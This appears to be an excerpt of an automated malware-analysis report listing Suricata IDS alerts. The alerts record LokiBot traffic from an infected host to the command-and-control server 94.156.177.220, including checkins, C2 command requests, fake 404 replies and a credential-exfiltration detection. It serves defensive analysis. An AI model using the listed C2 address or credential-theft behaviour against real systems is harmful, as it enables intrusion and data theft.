              Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.18:49704 -> 94.156.177.220:80
              Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.18:64176 -> 94.156.177.220:80
              Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.18:64184 -> 94.156.177.220:80
              Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.18:64254 -> 94.156.177.220:80
              Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.18:49706 -> 94.156.177.220:80
              Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.18:64173 -> 94.156.177.220:80
              Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.18:64184 -> 94.156.177.220:80
              Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.18:64223 -> 94.156.177.220:80
              Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.18:64173 -> 94.156.177.220:80
              Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.18:49710 -> 94.156.177.220:80
              Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.18:64173 -> 94.156.177.220:80
              Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.18:64223 -> 94.156.177.220:80
              Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.18:64222 -> 94.156.177.220:80
              Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.18:64170 -> 94.156.177.220:80
              Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.18:64195 -> 94.156.177.220:80
              Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.18:64215
              Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.18:64216 -> 94.156.177.220:80
              Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.18:64195 -> 94.156.177.220:80
              Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.18:64195 -> 94.156.177.220:80
              Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.18:64187 -> 94.156.177.220:80
              Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.18:49709 -> 94.156.177.220:80
              Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.18:64173 -> 94.156.177.220:80
              Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.18:64187 -> 94.156.177.220:80
              Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.18:49709 -> 94.156.177.220:80
              Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.18:64176 -> 94.156.177.220:80
              Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.18:64168 -> 94.156.177.220:80
              Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.18:64209 -> 94.156.177.220:80
              Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.18:49706 -> 94.156.177.220:80
              Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.18:64174 -> 94.156.177.220:80
              Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.18:64174 -> 94.156.177.220:80
              Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.18:64191 -> 94.156.177.220:80
              Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.18:64183 -> 94.156.177.220:80
              Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.18:49701 -> 94.156.177.220:80
              Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.18:64170 -> 94.156.177.220:80
              Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.18:49701 -> 94.156.177.220:80
              Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.18:64170 -> 94.156.177.220:80
              Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.18:64228 -> 94.156.177.220:80
              Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.18:64228 -> 94.156.177.220:80
              Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.18:64231 -> 94.156.177.220:80
              Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.18:49700 -> 94.156.177.220:80
              Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.18:64228 -> 94.156.177.220:80
              Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.18:64231 -> 94.156.177.220:80
              Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.18:64168 -> 94.156.177.220:80
              Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.18:49704 -> 94.156.177.220:80
              Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.18:64216
              Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.18:64183 -> 94.156.177.220:80
              Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.18:64183 -> 94.156.177.220:80
              Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.18:64170 -> 94.156.177.220:80
              Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.18:64170 -> 94.156.177.220:80
              Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.18:49701
              Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.18:64219 -> 94.156.177.220:80
              Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.18:64219 -> 94.156.177.220:80
              Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.18:64167 -> 94.156.177.220:80
              Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.18:64184
              Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.18:64167 -> 94.156.177.220:80
              Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.18:64201
              Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.18:64260 -> 94.156.177.220:80
              Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.18:64172 -> 94.156.177.220:80
              Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.18:64186 -> 94.156.177.220:80
              Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.18:64172 -> 94.156.177.220:80
              Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.18:64183
              Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.18:64195 -> 94.156.177.220:80
              Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.18:64172 -> 94.156.177.220:80
              Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.18:64195 -> 94.156.177.220:80
              Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.18:64189 -> 94.156.177.220:80
              Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.18:64169 -> 94.156.177.220:80
              Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.18:64189 -> 94.156.177.220:80
              Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.18:64222 -> 94.156.177.220:80
              Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.18:64195
              Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.18:64189 -> 94.156.177.220:80
              Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.18:49706
              Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.18:64254
              Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.18:64209
              Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.18:49710 -> 94.156.177.220:80
              Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.18:64219 -> 94.156.177.220:80
              Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.18:64221 -> 94.156.177.220:80
              Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.18:64172 -> 94.156.177.220:80
              Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.18:64221 -> 94.156.177.220:80
              Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.18:64172 -> 94.156.177.220:80
              Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.18:64212 -> 94.156.177.220:80
              Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.18:64202 -> 94.156.177.220:80
              Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.18:64212 -> 94.156.177.220:80
              Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.18:64228 -> 94.156.177.220:80
              Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.18:64228 -> 94.156.177.220:80
              Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.18:64260 -> 94.156.177.220:80
              Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.18:64170
              Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.18:49710
              Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.18:64179 -> 94.156.177.220:80
              Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.18:64179 -> 94.156.177.220:80
              Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.18:64179 -> 94.156.177.220:80
              Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.18:64179 -> 94.156.177.220:80
              Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.18:64179 -> 94.156.177.220:80
              Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.18:64182 -> 94.156.177.220:80
              Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.18:64182 -> 94.156.177.220:80
              Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.18:64182 -> 94.156.177.220:80
              Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.18:64179
              Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.18:64182 -> 94.156.177.220:80
              Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.18:64182 -> 94.156.177.220:80
              Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.18:64196 -> 94.156.177.220:80
              Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.18:64196 -> 94.156.177.220:80
              Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.18:64182
              Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.18:64196 -> 94.156.177.220:80
              Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.18:64196 -> 94.156.177.220:80
              Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.18:64196 -> 94.156.177.220:80
              Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.18:64196
              Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.18:64192 -> 94.156.177.220:80
              Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.18:64192 -> 94.156.177.220:80
              Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.18:64192 -> 94.156.177.220:80
              Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.18:64192 -> 94.156.177.220:80
              Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.18:49709 -> 94.156.177.220:80
              Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.18:64259 -> 94.156.177.220:80
              Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.18:64259 -> 94.156.177.220:80
              Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.18:64259 -> 94.156.177.220:80
              Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.18:64252 -> 94.156.177.220:80
              Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.18:64252 -> 94.156.177.220:80
              Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.18:49700 -> 94.156.177.220:80
              Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.18:64235 -> 94.156.177.220:80
              Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.18:49700 -> 94.156.177.220:80
              Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.18:64235 -> 94.156.177.220:80
              Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.18:64259 -> 94.156.177.220:80
              Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.18:64168 -> 94.156.177.220:80
              Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.18:64191 -> 94.156.177.220:80
              Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.18:64231
              Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.18:64187
              Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.18:64222 -> 94.156.177.220:80
              Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.18:64222 -> 94.156.177.220:80
              Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.18:64232 -> 94.156.177.220:80
              Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.18:64219 -> 94.156.177.220:80
              Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.18:64219 -> 94.156.177.220:80
              Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.18:49708
              Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.18:64176 -> 94.156.177.220:80
              Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.18:64176 -> 94.156.177.220:80
              Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.18:64219
              Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.18:49703 -> 94.156.177.220:80
              Source: Network trafficSuricata IDS: 2024312 - Severity 1 - ET MALWARE LokiBot Application/Credential Data Exfiltration Detected M1 : 192.168.2.18:49700 -> 94.156.177.220:80
              Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.18:64221 -> 94.156.177.220:80
              Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.18:64202 -> 94.156.177.220:80
              Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.18:64212 -> 94.156.177.220:80
              Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.18:64202 -> 94.156.177.220:80
              Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.18:64180 -> 94.156.177.220:80
              Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.18:64168 -> 94.156.177.220:80
              Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.18:64168 -> 94.156.177.220:80
              Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.18:64260 -> 94.156.177.220:80
              Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.18:64212 -> 94.156.177.220:80
              Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.18:64192 -> 94.156.177.220:80
              Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.18:64221 -> 94.156.177.220:80
              Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.18:64221 -> 94.156.177.220:80
              Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.18:64259 -> 94.156.177.220:80
              Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.18:64223
              Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.18:64172
              Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.18:64168
              Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.18:64191 -> 94.156.177.220:80
              Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.18:64192
              Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.18:49704 -> 94.156.177.220:80
              Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.18:64232 -> 94.156.177.220:80
              Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.18:64232 -> 94.156.177.220:80
              Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.18:64222
              Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.18:64251 -> 94.156.177.220:80
              Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.18:49703 -> 94.156.177.220:80
              Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.18:64251 -> 94.156.177.220:80
              Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.18:64251 -> 94.156.177.220:80
              Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.18:64189 -> 94.156.177.220:80
              Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.18:64180 -> 94.156.177.220:80
              Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.18:64190 -> 94.156.177.220:80
              Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.18:64176
              Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.18:64202 -> 94.156.177.220:80
              Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.18:64202 -> 94.156.177.220:80
              Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.18:64190 -> 94.156.177.220:80
              Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.18:64212 -> 94.156.177.220:80
              Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.18:64260 -> 94.156.177.220:80
              Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.18:64186 -> 94.156.177.220:80
              Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.18:64252 -> 94.156.177.220:80
              Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.18:64169 -> 94.156.177.220:80
              Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.18:64186 -> 94.156.177.220:80
              Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.18:64169 -> 94.156.177.220:80
              Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.18:64252 -> 94.156.177.220:80
              Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.18:64169 -> 94.156.177.220:80
              Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.18:64228
              Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.18:64235
              Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.18:64197 -> 94.156.177.220:80
              Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.18:64189 -> 94.156.177.220:80
              Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.18:64180 -> 94.156.177.220:80
              Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.18:64167
              Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.18:64229 -> 94.156.177.220:80
              Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.18:64229 -> 94.156.177.220:80
              Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.18:64229 -> 94.156.177.220:80
              Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.18:64180 -> 94.156.177.220:80
              Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.18:64237 -> 94.156.177.220:80
              Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.18:64237 -> 94.156.177.220:80
